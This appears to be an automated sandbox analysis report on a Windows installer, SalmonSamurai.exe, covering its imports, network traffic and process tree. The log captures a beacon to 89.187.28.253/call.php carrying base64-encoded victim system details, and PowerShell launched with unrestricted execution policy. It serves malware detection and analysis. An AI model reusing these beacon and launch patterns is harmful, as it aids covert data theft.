                                                                                                                                                                                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                                                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                                                                                                          KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.656157970 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.656250000 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.656445980 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.656766891 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.656810999 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.245346069 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.245388031 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.245441914 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.245903969 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.245918036 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.888608932 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.889693022 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.889770985 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.890752077 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.890821934 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.893445969 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.893521070 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.893920898 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.893938065 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:58.947385073 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.320063114 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.320127964 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.320588112 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.321122885 CET49748443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.321178913 CET44349748172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.459784985 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.461061954 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.461080074 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.464883089 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.464943886 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.465349913 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.465428114 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.465508938 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.509865999 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.509877920 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.556744099 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.728899002 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.729012966 CET44349749172.64.41.3192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:59.729077101 CET49749443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.339160919 CET4986280192.168.2.489.187.28.253
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.459026098 CET804986289.187.28.253192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.459141970 CET4986280192.168.2.489.187.28.253
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.459697008 CET4986280192.168.2.489.187.28.253
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.581892967 CET804986289.187.28.253192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:02.860691071 CET804986289.187.28.253192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:02.860814095 CET804986289.187.28.253192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:02.860881090 CET4986280192.168.2.489.187.28.253
                                                                                                                                                                                                                                          Dec 23, 2024 17:07:02.871927023 CET4986280192.168.2.489.187.28.253
                                                                                                                                                                                                                                          Dec 23, 2024 17:07:02.991715908 CET804986289.187.28.253192.168.2.4

                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.339353085 CET6281353192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.339596987 CET6114453192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.478662968 CET53611441.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.479599953 CET53628131.1.1.1192.168.2.4

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.339353085 CET192.168.2.41.1.1.10xd53aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.339596987 CET192.168.2.41.1.1.10x46c8Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.478662968 CET1.1.1.1192.168.2.40x46c8No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.479599953 CET1.1.1.1192.168.2.40xd53aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 23, 2024 17:04:57.479599953 CET1.1.1.1192.168.2.40xd53aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          • 89.187.28.253

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.44986289.187.28.253801272C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:01.459697008 CET608OUTGET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV9NOE5DMVVfdHJ1ZV9EUFNfWElfV2luZG93cyAxMCBQcm9fMTIzIG1pbnV0ZXMgKDAuMDUgaG91cnMpX0M6XFVzZXJzXGpvbmVzXzA2MTU0NF9qb25lc19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xqb25lc1xBcHBEYXRhXExvY2FsXFRlbXBfSk9ORVMtUENfX0ludGVsNjQgRmFtaWx5IDYgTW9kZWwgMTQzIFN0ZXBwaW5nIDgsIEdlbnVpbmVJbnRlbF9BTUQ2NF9DOl8yX0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1
                                                                                                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                          User-Agent: axios/0.27.2
                                                                                                                                                                                                                                          Host: 89.187.28.253
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Dec 23, 2024 17:06:02.860691071 CET321INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                          Date: Mon, 23 Dec 2024 16:06:02 GMT
                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                          Dec 23, 2024 17:07:02.871927023 CET6OUTData Raw: 00
                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.449748172.64.41.34436340C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-23 16:04:58 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                          2024-12-23 16:04:58 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                          2024-12-23 16:04:59 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          Date: Mon, 23 Dec 2024 16:04:59 GMT
                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                          CF-RAY: 8f69972dc9fe8c83-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          2024-12-23 16:04:59 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          1192.168.2.449749172.64.41.34436340C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-23 16:04:59 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                          2024-12-23 16:04:59 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:11:04:22
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SalmonSamurai.exe"
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          File size:74'023'200 bytes
                                                                                                                                                                                                                                          MD5 hash:4CE4A1F912D0B9840A7F568454C6C45A
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:11:04:41
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Imagebase:0x7ff6f6bb0000
                                                                                                                                                                                                                                          File size:160'143'360 bytes
                                                                                                                                                                                                                                          MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:11:04:43
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
                                                                                                                                                                                                                                          Imagebase:0x7ff68ea40000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:11:04:43
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:11:04:43
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                          Imagebase:0x7ff6d1a30000
                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:11:04:43
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
                                                                                                                                                                                                                                          Imagebase:0x7ff68ea40000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:11:04:43
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
